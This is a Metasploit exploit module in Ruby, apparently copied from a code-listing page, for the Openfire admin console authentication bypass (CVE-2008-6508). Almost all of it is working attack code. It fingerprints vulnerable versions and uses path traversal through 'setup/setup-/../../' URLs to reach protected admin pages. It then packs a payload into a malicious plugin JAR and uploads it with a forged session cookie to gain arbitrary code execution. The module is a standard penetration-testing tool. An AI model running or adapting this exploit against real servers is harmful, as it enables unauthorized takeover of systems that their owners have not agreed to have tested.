1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name'=> 'Openfire Admin Console Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might turn the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually. }, 'Author'=> [ 'Andreas Kurtz', # Vulnerability discovery 'h0ng10' # Metasploit module ], 'License' => MSF_LICENSE, 'References'=> [ [ 'CVE', '2008-6508' ], [ 'OSVDB', '49663' ], [ 'BID', '32189' ], [ 'EDB', '7075' ], [ 'URL', 'http://community.igniterealtime.org/thread/35874' ] ], 'DisclosureDate' => 'Nov 10 2008', 'Privileged'=> true, 'Platform'=> ['java', 'win', 'linux' ], 'Stance'=> Msf::Exploit::Stance::Aggressive, 'Targets' => [ # # Java version # [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ], # # Platform specific targets # [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ] ], 'DefaultTarget' => 0, )) register_options( [ Opt::RPORT(9090), OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('PLUGINNAME',[ false, 'Openfire plugin base name, (default: random)' ]), OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]), OptString.new('PLUGINDESC',[ false, 'Openfire plugin description, (default: random)' ]), OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]), ], self.class) end def check base = target_uri.path base << '/' if base[-1, 1] != '/' path = "#{base}login.jsp" res = send_request_cgi( { 'uri'=> path }) if (not res) or (res.code != 200) print_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown end versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ if versioncheck.nil? then print_error("Unable to detect Openfire version") return Exploit::CheckCode::Unknown end print_status("Detected version: #{$1}.#{$2}.#{$3}") version = "#{$1}#{$2}#{$3}".to_i return Exploit::CheckCode::Safe if version > 360 # Just to be sure, try to access the log page path = "#{base}setup/setup-/../../log.jsp" res = send_request_cgi( { 'uri'=> path }) if (not res) or (res.code != 200) print_error("Failed: Error requesting #{path}") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Vulnerable end def get_plugin_jar(plugin_name) files = [ [ "logo_large.gif" ], [ "logo_small.gif" ], [ "readme.html" ], [ "changelog.html" ], [ "lib", "plugin-metasploit.jar" ] ] jar = Rex::Zip::Jar.new jar.add_files(files, File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508")) plugin_author = datastore['PLUGINAUTHOR'] || rand_text_alphanumeric(8+rand(8)) plugin_desc = datastore['PLUGINDESC'] || rand_text_alphanumeric(8+rand(8)) plugin_xml = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2008-6508", "plugin.xml"), "rb") {|fd| fd.read() } plugin_xml.gsub!(/PLUGINNAME/, plugin_name) plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc) plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author) jar.add_file("plugin.xml", plugin_xml) jar end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8)) plugin = get_plugin_jar(plugin_name) arch = target.arch plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] if (p = exploit_regenerate_payload(plat, arch)) == nil print_error("Failed to regenerate payload") return end plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack) plugin.build_manifest # Upload the plugin to the server print_status("Uploading plugin #{plugin_name} to the server") boundary = rand_text_alphanumeric(6) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"uploadfile\"; " data << "filename=\"#{plugin_name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n" data << plugin.pack data << "\r\n--#{boundary}--" res = send_request_cgi({ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin", 'method'=> 'POST', 'data'=> data, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Length' => data.length, 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) print_error("Warning: got no response from the upload, continuing...") if !res # Delete the uploaded JAR file if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ 'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}", 'headers' => { 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") end end end end |